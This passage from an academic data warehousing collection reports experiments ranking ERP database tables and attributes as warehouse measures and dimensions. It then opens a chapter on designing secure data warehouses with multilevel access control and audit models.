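    return total / (len(measures) + len(dimensions))
```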
EXPERIMENTAL EVALUATION
As stated in the introduction, we have tested our methodology on three DB subsets of two real-world business systems. The considered
subsets are characterized by hundreds of tables, thousands of attributes and millions of records. In particular, while DB01 and DB02 correspond to different instantiations of the same DB schema (the same ERP system used by two different commercial organizations), DB03 has a different DB schema (it is based on a different ERP system). For the experimental evaluation, we asked an expert to build a unique (and relatively simple) schema for a commercial DW. The expert selected the attributes that are the most suitable to support decision processes. In particular, the DW built by
the expert is characterized by a star schema where six attributes are used as measures (nm = 6) and nine attributes as dimensions (nd = 9). Starting from this schema, we built three DWs, filling them with the three different DB sources. As a result, the attributes chosen to build the first two DWs are physically the same (since they belong to the same DB schema), while a different set of attributes (characterized by the same semantics as those selected for the previous DWs) was chosen for the DW03 construction. We then tested the effectiveness of our methodology by considering the
Table 3. List of tables of DB01, DB02 and DB03 ranked according to (a) Sd and (b) Sm

(a) Dimensions

Tables of DB01 | Sd
gum | 0.7480
zon | 0.7461
smag | 0.7459
… | …
art | 0.6718
xsr | 0.5004

Tables of DB02 | Sd
gum | 0.7481
zon | 0.7463
smag | 0.7458
… | …
xsr | 0.5984
art | 0.5780

Tables of DB03 | Sd
COW_GRUPPO_IMPREND | 0.7494
COW_ZONA_COMMERCIALE | 0.7490
MAG_TAB_RICL_DESCR | 0.7465
… | …
VEW_V_BOLLA_RIGA_ADD | 0.6634
MAG_COSTO | 0.5423

(b) Measures

Tables of DB01 | Sm
xsr | 0.4996
art | 0.3282
… | …
smag | 0.2541
zon | 0.2539
gum | 0.2520

Tables of DB02 | Sm
art | 0.4220
xsr | 0.4016
… | …
smag | 0.2542
zon | 0.2537
gum | 0.2519

Tables of DB03 | Sm
MAG_COSTO | 0.4577
VEW_V_BOLLA_RIGA_ADD | 0.3366
… | …
MAG_TAB_RICL_DESCR | 0.2535
COW_ZONA_COMMERCIALE | 0.2510
COW_GRUPPO_IMPREND | 0.2506
above three case studies. The analysis is mainly targeted at evaluating whether the proposed metrics effectively support quantitative analysis by taking into account (i) the structure of the initial DB (in this experiment, two different DB schemas are considered), (ii) the data actually stored in the initial DB (in this experiment, three different data sources are considered), and (iii) the DW schema (in this experiment, a unique DW schema is considered). We have then evaluated both whether the proposed methodology can be effectively used to drive design choices during the DW construction and whether, at the end of the selection phase, it can be used for deriving information on the total quality of the final DW.
Table Indexes
In the first phase of our experiment, we have considered the metrics we propose for the DB tables and evaluated whether they highlight the tables that are more suitable for extracting measures and dimensions. The global indexes Sd and Sm for the three DBs are summarized in Table 3(a) and Table 3(b), respectively. The derived quality measurements for the DB tables are consistent with our expectations; for example, for both DB01 and DB02, the procedure highlights that xsr and art are the most suitable tables for extracting measures. Indeed, while the first table stores selling information, the second one includes pricing information on products. It is also interesting to note that, although based on the same DB schema, different indexes are computed for DB01 and DB02 due to different distributions of data. With respect to measures, a similar result is obtained for DB03, where the table MAG_COSTO is semantically equivalent to art, and VEW_V_BOLLA_RIGA_ADD stores the same kind of information stored in xsr. The derived quality measurements also indicate that in both DB01 and DB02 smag, zon and gum are the most suitable tables for extracting dimensions, while
they turn out to be less suitable for selecting measures. Indeed, smag and gum store information on categories of products and customers, respectively, while zon stores geographical information on customers. The same holds for COW_GRUPPO_IMPREND, COW_ZONA_COMMERCIALE and MAG_TAB_RICL_DESCR, which store the same kind of information as gum, zon and smag, respectively. In general, the tables that are the best candidates for extracting measures are the worst ones for extracting dimensions, and vice versa. It is also interesting to note that the expert selected as measures attributes belonging to xsr and art in the case of DW01 and DW02, and attributes belonging to MAG_COSTO and VEW_V_BOLLA_RIGA_ADD for building DW03. On the other hand, some of the dimensions chosen by the expert correspond to attributes belonging to gum, zon and smag in the case of DW01 and DW02, while the expert selected attributes belonging to COW_GRUPPO_IMPREND, COW_ZONA_COMMERCIALE and MAG_TAB_RICL_DESCR for building DW03.
Attribute Indexes
In the second phase of the experiment, we have considered the metrics we propose for the DB attributes. Using the indexes computed in the previous phase, for each considered attribute we derive the quality indexes Gd and Gm, summarized in Table 4(a) and Table 4(b), respectively. The last column of Table 4(a) and Table 4(b) specifies rankd and rankm, respectively (0 corresponds to the first position and thus to the best candidate, while 1 corresponds to the last position and thus represents the worst candidate). These computed indexes are also consistent with our expectations; for example, in DB01 the attribute ag_cod_agente turns out to be the most appropriate one to be used as a dimension, while being unsuitable as a measure. This result is in line with our expectations, since the considered attribute stores
information on sellers’ codes. On the other hand, the attribute xr_valore turns out to be the most appropriate one to be used as a measure, but unsuitable to be used as a dimension. Also in this case, the result is consistent with the semantics of the data, since this attribute stores pricing information. Similar results are obtained for DB02 and DB03. Moreover, it is interesting to note that the attributes occupying the last positions are the same in both Table 4(a) and Table 4(b) (e.g., zn_ragg_1 for DB01). This is due to the fact that these attributes are characterized by
a high percentage of null values and are therefore unsuitable to be used both as dimensions and as measures in the considered DBs.
Indexes of Selected Measures and Dimensions
In the third phase of our experiment, we have considered the DW built by the expert and analyzed the rank of the selected attributes in order to evaluate the effectiveness of our methodology in correctly measuring the quality of the attributes according to their role in the DW.
Table 4. Attributes of DB01, DB02 and DB03 ranked according to (a) Gd and (b) Gm

(a) Dimensions

Attributes of DB01 | Gd | rankd
ag_cod_agente | 0.5974 | 0.0000
zn_sigla | 0.5661 | 0.0059
… | … | …
xr_valore | 0.1426 | 0.7219
… | … | …
xr_sconto_ex_vsc | 0.0000 | 0.9941
zn_ragg_1 | 0.0000 | 1.0000

Attributes of DB02 | Gd | rankd
ps_sigla_paese | 0.5956 | 0.0000
gu_codice | 0.5743 | 0.0056
… | … | …
xr_prezzo | 0.1038 | 0.5307
… | … | …
xr_val_sco | 0.0000 | 0.9944
zn_ragg_1 | 0.0000 | 1.0000

Attributes of DB03 | Gd | rankd
COD_VOCE_RICL_COD_IND_RICL | 0.6849 | 0.0000
COD_LINGUA | 0.6375 | 0.0020
… | … | …
COSTO | 0.2131 | 0.6373
… | … | …
VAL_SCONTO_TEST | 0.0000 | 0.9980
VOCE_DI_SPESA | 0.0000 | 1.0000

(b) Measures

Attributes of DB01 | Gm | rankm
xr_valore | 0.3515 | 0.0000
xr_num_ord | 0.3006 | 0.0059
… | … | …
ag_cod_agente | 0.0939 | 0.6982
… | … | …
xr_sconto_ex_vsc | 0.0000 | 0.9941
zn_ragg_1 | 0.0000 | 1.0000

Attributes of DB02 | Gm | rankm
xr_prezzo | 0.2742 | 0.0000
xr_valore | 0.2741 | 0.0056
… | … | …
ps_sigla_paese | 0.0937 | 0.5251
… | … | …
xr_val_sco | 0.0000 | 0.9944
zn_ragg_1 | 0.0000 | 1.0000

Attributes of DB03 | Gm | rankm
COSTO | 0.2565 | 0.0000
COSTO_CALCOLATO | 0.2529 | 0.0020
… | … | …
COD_VOCE_RICL_COD_IND_RICL | 0.0632 | 0.6529
… | … | …
VAL_SCONTO_TEST | 0.0000 | 0.9980
VOCE_DI_SPESA | 0.0000 | 1.0000
Table 5. Ranking of DW01, DW02 and DW03 measures

DW measure | Source (DB01 and DB02) | Source (DB03) | Gm (DB01) | Gm (DB02) | Gm (DB03) | rankm (DB01) | rankm (DB02) | rankm (DB03)
product quantity | xr_qta | QTA_SPEDITA | 0.2769 | 0.1725 | 0.1707 | 0.0179 | 0.2135 | 0.0452
product price | xr_valore | RIGA_PREZZO | 0.3515 | 0.2741 | 0.1452 | 0.0000 | 0.0056 | 0.1454
broker commission | xr_prov_age | PROVV_AG1 | 0.2720 | 0.0000 | 0.1629 | 0.0238 | 0.9607 | 0.0766
customer discount | xr_val_sco | SC_RIGA | 0.2617 | 0.0000 | 0.1685 | 0.0298 | 0.9888 | 0.0511
product last cost | a_ult_prz_pag | COSTO_F1 | 0.2060 | 0.2026 | 0.2565 | 0.1071 | 0.1236 | 0.0020
product std. cost | a_prz_pag_stand | COSTO_F2 | 0.1873 | 0.2105 | 0.2565 | 0.1667 | 0.0955 | 0.0000
In Table 5, we report the measures chosen for building the three DWs and the related ranks. With respect to the choice of measures, our methodology evaluates the quality of the design choices differently for the three DWs. Indeed, the computed indexes do not depend on the semantics of the selected measures (the typical criterion adopted by the expert for the DW construction), but rather on the data actually stored in the selected attributes and on the initial DB schema. To better evaluate the obtained results, we illustrate in Figure 8 the whole set of DB attributes ranked according to Gm, highlighting the measures chosen by the expert to build the DW. In the case of DW01, four out of six attributes selected by the expert rank within the top 3% of the whole set of considered attributes, and the remaining two attributes rank within the top 17%. A good result is also obtained for DW03, where five out of six attributes rank within the top 8% and the remaining attribute ranks within the top 15%. A different result is obtained for DW02, where four out of six attributes rank within the top 22% of the whole set of DB02 attributes, while the remaining two attributes are characterized by low data quality. We have then analyzed xr_prov_age and xr_val_sco, discovering that these attributes are characterized by a high percentage of null values (> 90%); although chosen by the expert for their semantics, in DB02 they are therefore not useful for analysis purposes. Our methodology also evaluates the attributes chosen as dimensions to build the DWs.
Figure 8. Derived quality for measures
In Table 6, we report the dimensions chosen for building the three DWs and the related ranks. In the case of DW01, five out of nine attributes rank within the top 6% of the whole set of considered attributes and three attributes within the top 18%; moreover, our procedure correctly highlights that xi_prov has scarce informative content, being characterized by a high percentage of null values (> 80%). A good result is also obtained for DW03, where all selected dimensions rank within the top 4% of the whole set of considered attributes. As in the case of measures, for the dimensions the expert also built DW02 by selecting some attributes that are semantically relevant but are actually not suitable to effectively support the analysis due to the stored data (also in this case, the percentage of null values of ag_cod_agente and a_cl_inv is over a given threshold). These attributes inevitably affect the quality of the final DW. All the other selected dimensions rank within the top 9% of the whole set of considered attributes. A graphical representation of these results is depicted in Figure 9, where the dimensions chosen by the expert to build the DWs are highlighted. Indeed, the construction and configuration of an effective DW requires not only knowledge of the logical structure of the DB and semantic information on its attributes, but also knowledge of how an organization actually uses the business system (since this influences the data distributions). The result confirms the effectiveness of the proposed methodology in supporting the design,
Table 6. Ranking of DW01, DW02 and DW03 dimensions

DW dimension | Source (DB01 and DB02) | Source (DB03) | Gd (DB01) | Gd (DB02) | Gd (DB03) | rankd (DB01) | rankd (DB02) | rankd (DB03)
product | a_sigla_art | COD_ARTICOLO | 0.5513 | 0.4727 | 0.5828 | 0.0417 | 0.1236 | 0.0177
product class | smg_tipo_codice | COD_VOCE_RICL_COD_IND_RICL_F1 | 0.5400 | 0.5666 | 0.6849 | 0.0536 | 0.0169 | 0.0020
warehouse class | a_cl_inv | COD_VOCE_RICL_COD_IND_RICL_F2 | 0.5175 | 0.0000 | 0.6849 | 0.0833 | 0.6910 | 0.0000
customer | sc_cod_s_conto | CONTI_CLIENTI_M_P | 0.4715 | 0.4970 | 0.6335 | 0.1786 | 0.0787 | 0.0039
customer class | gu_codice | COD_GRUPPO | 0.4987 | 0.5743 | 0.6224 | 0.1250 | 0.0056 | 0.0059
province | xi_prov | COD_PROVINCIA | 0.3644 | 0.4894 | 0.5582 | 0.3750 | 0.0899 | 0.0314
country | ps_sigla_paese | ELENCO_STATI_COD_ISO | 0.5634 | 0.5956 | 0.6124 | 0.0179 | 0.0000 | 0.0079
broker | ag_cod_agente | CONTI_FORNITORI_M_P | 0.5974 | 0.0000 | 0.6098 | 0.0000 | 0.5449 | 0.0098
commercial zone | zn_sigla | COD_ZONA_COMM | 0.5661 | 0.5662 | 0.5668 | 0.0060 | 0.0225 | 0.0275
creation and evaluation of DWs, since it is able to correctly highlight the attributes that are more suitable to be used as dimensions and measures.
DW Quality
The final phase of our experiment is targeted at comparing the derived global indicators measuring the quality of the three different DWs. Applying our methodology, we have obtained the global indicators I(DW01) = 0.415, I(DW02) = 0.308 and I(DW03) = 0.448. According to the computed measurements, DW03 is the best DW, while DW02 is the worst one, due to both the low quality of the data stored in the selected DB attributes and the initial DB schema. In the following section, we discuss the derived results in more detail.
ASSESSMENT
It is important to note that the final DW-quality measurement is influenced by three different factors:
• The DW design choices. For a given DB, the measured DW quality strictly depends on the selected measures and dimensions.
• The schema of the initial DB. Some indexes depend only on the initial DB schema. For example, given two DBs characterized by the same schema (e.g., DB01 and DB02), the attribute metrics m5 and m6 derive the same measurements independently of the data actually stored in the analyzed attributes.
• The characteristics and quality of the data actually stored in the selected attributes. Most indexes depend on the features (e.g., percentage of null values and data distribution) of the data actually stored in the selected DW attributes. As a result, given two DWs built starting from DBs characterized by the same schema, a metric can derive a different measurement depending on the values actually stored in the considered attribute.
Our methodology highlights that DW03 is the best DW, while DW02 is the worst one, due to both the low quality of the data stored in the selected DB attributes and the initial DB
schema. More specifically, in the case of DW01 and DW02 the first factor does not influence the evaluation, since the chosen measures and dimensions are exactly the same. We can thus easily derive that DW01 is better than DW02 because the data stored in the attributes chosen for building the first DW are more suitable for analysis purposes than those chosen for the second DW. The evaluation of DW03 as the best DW depends on a multitude of aspects, and precisely identifying the strong points of the third DW requires analyzing each computed index separately. For example, consider the index concerning the percentage of null values. Although DB03 is the DB characterized by the highest percentage of null values (as reported in Figure 3), the indexes concerning the attributes chosen for building DW03 highlight that these attributes store more valid values than the attributes chosen for building DW01 and DW02. It is important to note that the evaluation of the DWs depends on the measures and dimensions chosen to build the DW. Different requisites can lead the expert to change the selected measures and dimensions, and our procedure could then produce a completely different result. The selection of measures and dimensions is a semantic-dependent task, and our methodology is not designed to replace the work of the expert (by automatically proposing the attributes that are the
Figure 9. Derived quality for dimensions
best candidates for dimensions and measures); rather, our main goal is to propose a set of metrics aimed at helping the expert to select appropriate measures and dimensions (especially in the case of multiple choices) during the DW design phase and to evaluate the quality of the design choices taken at the end of the construction.
CONCLUSION
In this article, we have proposed a methodology that can be used (i) during the DW construction phase to drive the selection of measures and dimensions and (ii) to evaluate the final quality of the design choices. The proposed methodology is mainly focused on statistical and syntactical aspects of data and can be effectively paired with semantic-based solutions to support the DW construction and configuration. We have tested the proposed metrics on three DWs; the experimental evaluation demonstrated the effectiveness of our methodology in evaluating the DW, e.g., our methodology correctly highlighted some inappropriate initial design choices (e.g., the expert chose as a measure an attribute characterized by a percentage of null values greater than 90%). The proposed method is currently based on a set of six indexes for attributes and two indexes for tables; although these indexes are able to highlight
attributes that are more suitable to be used as measures and dimensions, in future work we intend to introduce additional indexes characterizing the attributes in order to improve the accuracy of the measurements. We are currently investigating whether conditional entropy and mutual information can be used for automatically discovering correlations among attributes, in order to enable our methodology to suggest alternative design choices during the DW creation. For example, an attribute could represent a valid alternative to another attribute if (i) it is strongly correlated with the second attribute and (ii) its measured quality is higher than that of the second attribute. From this point of view, we are also evaluating the possibility of including metrics that use information on DB relations (e.g., computing the ratio between incoming and outgoing table relations). Finally, we plan to evaluate whether an accurate tuning of the coefficients allows the procedure to further increase its effectiveness. We have recently started testing our metrics in completely different contexts to evaluate whether their effectiveness is independent of the specific application domain; to this end, we moved from commercial business systems to a DB collecting university examinations and another DB collecting motorway car crashes. This evaluation is also targeted at highlighting possible limitations of the proposed methodology and can elicit new requirements.
REFERENCES

Ballou, D. P., & Pazer, H. L. (1985). Modeling data and process quality in multi-input, multi-output information systems. Management Science, 31(2), 150-162.

Ballou, D. P., Wang, R. Y., Pazer, H. L., & Tayi, G. K. (1998). Modelling information manufacturing systems to determine information product quality. Management Science, 44(4), 462-484.

Chengalur-Smith, I. N., Ballou, D. P., & Pazer, H. L. (1999). The impact of data quality information on decision making: An exploratory analysis. IEEE Transactions on Knowledge and Data Engineering, 11(6), 853-864.

English, L. P. (1999). Improving data warehouse & business information quality: Methods for reducing costs and increasing profits. New York: Wiley.

Golfarelli, M., Maio, D., & Rizzi, S. (1998). The dimensional fact model: A conceptual model for data warehouses. International Journal of Cooperative Information Systems, 7(2/3), 215-247.

Jeusfeld, M. A., Quix, C., & Jarke, M. (1998). Design and analysis of quality information for data warehouses. In Proceedings of the International Conference on Conceptual Modeling (pp. 349-362).

Karr, A. F., Sanil, A. P., & Banks, D. L. (2006). Data quality: A statistical perspective. Statistical Methodology, 3(2), 137-173.

Kriebel, C. H. (1978). Evaluating the quality of information systems. In Proceedings of the BIFOA Symposium (pp. 18-20).

Phipps, C., & Davis, K. (2002). Automating data warehouse conceptual schema design and evaluation. In Proceedings of DMDW (pp. 23-32).

Pighin, M., & Ieronutti, L. (2007). From database to datawarehouses: A design quality evaluation. In Proceedings of the International Conference on Enterprise Information Systems (pp. 178-185).

Redman, T. C. (1996). Data quality for the information age. Norwood, MA: Artech House.

Scannapieco, M., Virgillito, A., Marchetti, C., Mecella, M., & Baldoni, R. (2004). The DaQuinCIS architecture: A platform for exchanging and improving data quality in cooperative information systems. Information Systems, 29(7), 551-582.
Wang, R.Y., & Strong D. M. (1996a). Beyond accuracy: What data quality means to data consumers. Journal of Management Information Systems, 12(4), 5-33.
Wang, R.Y., Storey, V. C., & Firth, C. P. (1995). A framework for analysis of data quality research. IEEE Transactions on Knowledge and Data Engineering, 7(4), 623-640.
Wang, R.Y., & Strong D. M. (1996b). Data quality systems evaluation and implementation. London: Cambridge Market Intelligence Ltd.
This work was previously published in International Journal of Data Warehousing and Mining, Vol. 4, Issue 3, edited by D. Taniar, pp. 15-34, copyright 2008 by IGI Publishing (an imprint of IGI Global).
Chapter 2.12
An MDA Compliant Approach for Designing Secure Data Warehouses Rodolfo Villarroel Universidad Católica del Maule, Chile Eduardo Fernández-Medina Universidad de Castilla-La Mancha, Spain Juan Trujillo Universidad de Alicante, Spain Mario Piattini Universidad de Castilla-La Mancha, Spain
ABSTRACT
This chapter presents an approach for designing secure Data Warehouses (DWs) that accomplishes the conceptual modeling of secure DWs independently of the target platform where the DW has to be implemented, because our complete approach follows the Model Driven Architecture (MDA) and Model Driven Security (MDS). In most real-world DW projects, security aspects are issues that usually rely on the DBMS administrators. We argue that the design of these security aspects should be considered together with the conceptual modeling of DWs from the early stages
of a DW project, allowing user security information to be attached to the basic structures of a Multidimensional (MD) model. In this way, we would be able to generate this information in a semi-automatic or automatic way for a target platform, and the final DW will better suit the user security requirements.
INTRODUCTION
The goal of information confidentiality is to ensure that users can only access the information that they are allowed to. In the case of multidimensional
(MD) models, confidentiality is crucial, because very sensitive business information can be discovered by executing a simple query. Several papers deal with the importance of security in the software development process. Ghosh, Howell, and Whittaker (2002) state that security must influence all aspects of design, implementation, and software tests. Hall and Chapman (2002) put forward ideas about how to build correct systems that fulfil not only the normal requirements but also the security ones. Nevertheless, security in databases and data warehouses is usually focused on secure data storage, and not on their design. Thus, a methodology of data warehouse design based on the UML, with the addition of security aspects, would allow us to design DWs with the syntax and power of UML and with the new security characteristics ready to be used whenever the application has security requirements that demand them. In this chapter, we present an approach for designing secure DWs as follows: we define the Model Driven Architecture (MDA) and Model Driven Security (MDS) compliant architecture of our approach, and we provide an Access Control and Audit (ACA) model for the conceptual MD modeling. Then, we extend the Unified Modeling Language (UML) with this ACA model, representing the security information (gathered in the ACA model) in the conceptual MD modeling, thereby allowing us to obtain secure MD models. This approach makes it possible to implement the secure MD models with any DBMS that is able to implement multilevel databases, such as Oracle Label Security and DB2 Universal Database (UDB). The remainder of this chapter is structured as follows: the next section introduces related work; then, we present the MDA and MDS compliant architecture of our approach. Finally, we present the main conclusions.
RELATED WORK
As this chapter treats different research topics, the related work is organized as follows.
Multidimensional Modeling
Lately, several MD data models have been proposed. Some of them fall into the logical level (such as the well-known star schema (Kimball & Ross, 2002)). Others may be considered formal models, as they provide a formalism for the consideration of the main MD properties. A review of the most relevant logical and formal models can be found in Blaschka, Sapia, Höfling, and Dinter (1998) and Abelló, Samos, and Saltor (2001). In this section, we will only make brief reference to the most relevant models that we consider “pure” conceptual MD models. These models provide a high level of abstraction for the main MD modeling properties at the conceptual level and are totally independent from implementation issues. One outstanding feature of these models is that they provide a set of graphical notations (such as the classical and well-known Extended Entity-Relationship model), which facilitates their use and reading. These are as follows: the Dimensional-Fact (DF) Model by Golfarelli, Maio, and Rizzi (1998), the Multidimensional/ER (M/ER) Model by Sapia, Blaschka, Höfling, and Dinter (1998), the starER Model by Tryfona, Busborg, and Christiansen (1999), the Yet Another Multidimensional Model (YAM2) by Abelló et al. (2001), and the model proposed by Trujillo, Palomar, Gómez, and Song (2001). Unfortunately, none of these approaches for MD modeling considers security as an important issue in its conceptual model, and consequently they do not solve the problem of modeling security from the early stages of a DW project.
Security Integration into the Design Process
There are a few proposals which attempt to integrate security into conceptual modeling, such as the Semantic Data Model for Security (Smith, 1991) and the Multilevel Object Modeling Technique (Marks & Sell, 1996), but they are partial (since they do not cover the complete development process). More recent proposals are UMLSec (Jürjens, 2002) and SecureUML (Lodderstedt, Basin, & Doser, 2002), where UML is extended to develop secure systems. These approaches are interesting, but they only deal with information systems (IS) in general, whilst conceptual database and DW design are not considered. Moreover, a methodology and a set of models have been proposed (Fernández-Medina & Piattini, 2003) in order to design secure databases for implementation with Oracle9i Label Security (OLS). This approach, based on the UML, is relevant because it considers security aspects in all stages of the database development process, from requirement-gathering to implementation. Together with the previous methodology, the proposed Object Security Constraint Language (OSCL), based on the Object Constraint Language (OCL) of UML, allows us to specify security constraints in the conceptual and logical database design process, and to implement them in a specific database management system (DBMS), OLS. Nevertheless, the previous methodology and models do not consider the design of secure MD models for DWs, and are therefore not appropriate for representing the peculiarities of DWs.
Access Control Models
Many proposals have been developed with the aim of protecting information against improper disclosure. All of them make use of the particularities of the systems they deal with, such as the types of objects, subjects, privileges, signs, and so on. For instance, there are authorization
models for data archives, database systems, XML documents, distributed hypertext systems, Web services, multimedia documents, and workflows. Nevertheless, although many authorization models that allow a flexible and simple specification of authorizations have been proposed, they rely on the particular properties of the underlying data model. Thus, these authorization models cannot be easily extended to other data models, such as MD modeling.
Security and Access Control Models for Data Warehouses
The peculiarity of DWs and of the MD model and its terms (facts, dimensions, classification hierarchies, and so on), used for both designing and querying DWs, makes it necessary to deal with specific access control and audit models for DWs. In the literature, we can find several initiatives for the inclusion of security in DWs. Many of them are focused on interesting aspects related to access control, multilevel security, its applications to federated databases, applications using commercial tools, and so on. These initiatives refer to specific aspects that allow us to improve DW security in acquisition, storage, and access aspects. However, none of them considers the security aspects in all stages of the DW development cycle, nor does any examine the introduction of security in the conceptual MD design. On the other hand, there are some interesting proposals which define authorization models for data warehouses, but they only deal with OLAP operations (e.g., roll-up or drill-down) accomplished with OLAP tools. So these are not conceived for their integration in MD modeling as part of the DW design process, and as a consequence, inconsistent security measures might well be defined. We believe that we should consider basic security measures for business DWs with a conceptual model from the early stages of a DW project. Then more specific security rules can be
defined for particular groups of users in terms of data marts, views, and OLAP tools, or any other analysis tools, but which are consistent with the main security rules defined for the DW. Finally, the work presented in Priebe & Pernul (2001) proposes the definition of basic security measures for main OLAP operations. To this end, authors propose the ADAPTed UML for specifying security measures on a UML class diagram which they use for the MD modeling of OLAP tools at the conceptual level. Although this is an interesting proposal that can be extended and improved, we consider two key aspects that should be given particular attention in this sense. The first of these is that the defined security measures are only based on the OLAP operations that users can carry out by using OLAP tools. The second is that its notation is simple, and rather than being a complete and formal model for data warehouses, we see it as a practical way of modeling simple OLAP scenarios. Some more complex elements of the MD model (e.g., the type of classification hierarchy) have a high impact on security measures, as in data warehouse systems users can access facts by navigating from different classification hierarchy paths, or then again access to facts or dimensions may be denied if users try to access a fine grain (low cardinality). What is more, one fact can be accessed if queried on its own, but access to the same fact can be absolutely forbidden if it is queried in combination with one dimension. Finally, all the above-presented proposals only examine access control, but not audit; so the approach proposed in this chapter is the first one to consider both access model and audit in the multidimensional modeling of DWs at the conceptual level.
AN MDA AND MDS COMPLIANT APPROACH
Model Driven Architecture (MDA) is an Object Management Group standard that addresses
the complete life cycle of designing, deploying, integrating, and managing applications. MDA (Kleppe, Warmer, & Bast, 2003) separates the specification of system functionality from the specification of the implementation of that functionality on a specific technology platform. Thus, MDA encourages specifying a Platform Independent Model (PIM) by using any specification language. Then, this PIM can be transformed into Platform Specific Models (PSM) in order to be executed on a concrete platform by transforming this PSM into the corresponding Code. We have aligned our approach for the conceptual modeling of DWs with the MDA approach (see Figure 1). Our enriched PIM can be transformed into any logical model representing the multidimensionality of data (e.g., the star schema), and finally this logical model can be transformed into a particular DBMS (e.g., Oracle). On the other hand, Model Driven Security (MDS) is a new approach (Basin, Doser, & Lodderstedt, 2003) for integrating security into information systems design. This approach considers design models and security models, which are combined, leading to a new kind of model that is called a security design model. Our approach has also been aligned with MDS (see Figure 1). We have considered a Raw PIM, which is the design model. This model does not contain security details, and is used for the conceptual modeling of DWs. Moreover, we have defined our ACA model, which is completely independent from the design model (and of course it is independent from the target platform, so in some sense it is another PIM) and, in MDS terminology, is the security model. This independence is highly important, because we could use this security model together with other DW conceptual models. Combining both the design model and the security model, an enriched PIM is obtained. This security design model is a DW conceptual model that also contains the security details that can be specified with our ACA model. The design model
Figure 1. Merging the UML extension and the ACA Model into one PIM
must usually be extended to be able to represent the security details. Therefore, this enriched PIM with all the security information is the model that will participate in the MDA architecture in the upcoming transformations. Raw PIM. Next, we outline the approach, based on the UML, we use for DW conceptual modeling (Lujan-Mora, Trujillo, & Song, 2002; Trujillo et al., 2001). This approach has been specified by means of a UML profile that contains the necessary stereotypes in order to carry out the MD modeling at the conceptual level successfully. In this approach, structural properties of MD modeling are represented by means of a UML class diagram in which the information is clearly organized into facts (items of interest for an enterprise) and dimensions (context in which facts have to be analyzed). Facts and dimensions are represented by means of fact classes (stereotype Fact) and dimension classes (stereotype Dimension) respectively. Fact classes are defined as composite classes in shared aggregation relationships of n dimension classes
(see Figure 2). The minimum multiplicity in the role of the dimension classes is 1 (all the facts must always be related to all dimensions). A fact is composed of measures or fact attributes. By default, all measures in the fact class are considered to be additive. With respect to dimensions, each level of a classification hierarchy is specified by a base class (stereotype Base). An association of base classes specifies the relationship between two levels of a classification hierarchy. Every base class must also contain an identifying attribute (OID) and a descriptor attribute (stereotype D). These attributes are necessary for an automatic generation process into commercial OLAP tools, as these tools store this information on their metadata. Access Control and Audit (ACA) Model. Although there are many authorization models that allow a flexible and easy specification of authorizations, they rely on the particular properties of the underlying data model. As a result, these authorization models cannot be easily extended to other data models, such as the MD modeling.
Figure 2. Multidimensional modeling using the UML
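Purely as an illustration of the kind of structure Figure 2 depicts, the stereotyped elements of the profile could be mirrored by simple data classes; the chapter's actual artifact is a UML profile, not code, so the classes, fields and the small example below are assumptions of this sketch.

```python
from dataclasses import dataclass, field

@dataclass
class BaseClass:                       # stereotype Base: one level of a hierarchy
    name: str
    oid: str                           # identifying attribute (OID)
    descriptor: str                    # descriptor attribute (D)
    dimension_attributes: list = field(default_factory=list)   # DA attributes
    parent: "BaseClass | None" = None  # next (coarser) classification level

@dataclass
class DimensionClass:                  # stereotype Dimension
    name: str
    terminal_level: BaseClass          # finest classification level

@dataclass
class FactClass:                       # stereotype Fact: composite of n dimensions
    name: str
    measures: list                     # fact attributes (FA), additive by default
    dimensions: list                   # every fact relates to all its dimensions

# Example loosely following Figure 2.
month = BaseClass("Month", oid="month_code", descriptor="name")
time_dim = DimensionClass("Time", BaseClass("Day", "time_code", "day", parent=month))
sales = FactClass("Sales", measures=["qty", "price", "inventory"], dimensions=[time_dim])
```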
Access control is not a complete solution for securing a system as it must be coupled with auditing. Auditing requires the recording of all user requests and activities for their later analysis. Therefore, in our approach, we take both concepts into consideration for their integration in the conceptual MD modeling design. Access control models are typically composed of a set of authorization rules that regulate accesses to objects. Each authorization rule usually specifies the subject to which the rule applies, the object to which the authorization refers, the action to which the rule refers, and the sign describing whether the rule permits or denies the access. In order to regulate access to objects in a MD model, we have considered the Mandatory Access Control model (in the form of multilevel security policies), which is based on the classification of subjects and objects in the system. So, our access control and audit model allows us to specify sensitivity information assignment rules for all elements of MD models (facts, dimensions, etc.), which define static and dynamic object classification. Moreover, our model allows us to define authorization rules that represent exceptions to the general multilevel rules, where the designer can
specify different situations in which the multilevel rules are not sufficient. Finally, a set of audit rules, which represent the corresponding audit requirements, can be included in the model. In multilevel policies, an access class is assigned to each object and subject. The most common access class is defined as a security level and a set of categories. The security level is an element of a hierarchically ordered set, such as Top Secret (TS), Secret (S), Confidential (C), and Unclassified (U), where, TS > S > C > U. The set of categories is a subset of an unordered set, whose elements reflect functional, or competence, areas. The access class is one element of a partially-ordered set of classes, where an access class c1 dominates an access class c2 iff the security level of c1 is greater than or equal to that of c2 and the categories of c1 include those of c2. We have considered a secrecy-based mandatory policy, so the two principles that must be satisfied to protect information confidentiality are: i) no-read-up (a subject is allowed a read-access to an object only if the access class of the subject dominates the access class of the object), and ii) no-write-down (a subject is allowed a write-access to an object only if the access class of the subject is dominated by the access class of the object).
In our model, we define an access class on the basis of three different but compatible ways of classifying users, namely by their security level, the user roles they play, and the user compartments they belong to:
• Security levels: This indicates the clearance level of the user.
• Security user roles: Used by a company to organize users in a hierarchical role structure, according to the responsibilities of each type of work. Each user can play more than one role.
• Security user compartments: Also used by an organization to classify users into a set of horizontal compartments or groups, such as geographical location, area of work, and so on. Each user can belong to one or more compartments.
Therefore, in our model, the access class is one element of a partially ordered set of classes, where an access class c1 dominates an access class c2 iff the security level of c1 is greater than or equal to that of c2, the compartments of c1 include those of c2, and at least one of the user roles of c1 (or one of its ascendants) is defined for c2. Thus, for each object in the model, the user access requirements (security level, user roles, and user compartments) can be defined, thereby specifying with high accuracy which users can access each particular object. Enriched PIM. The goal of this UML extension is to be able to design an MD conceptual model, classifying the information in order to define which properties a user has to own to be entitled to access the information. So, we have to consider three main stages (a sketch of the resulting access check follows this list):
• Defining precisely the organization of users that will have access to the MD system. We can define a precise level of granularity considering three ways of organizing users: security hierarchy levels (which indicate the clearance level of the user), user compartments (which indicate a horizontal classification of users), and user roles (which indicate a hierarchical organization of users according to their roles or responsibilities within the organization).
• Classifying the information in the MD model. We can define for each element of the model (fact class, dimension class, fact attribute, etc.) its security information, specifying a sequence of security levels, a set of user compartments, and a set of user roles. We can also specify security constraints considering these security attributes. The security information and constraints indicate the security properties that users have to own to be able to access the information.
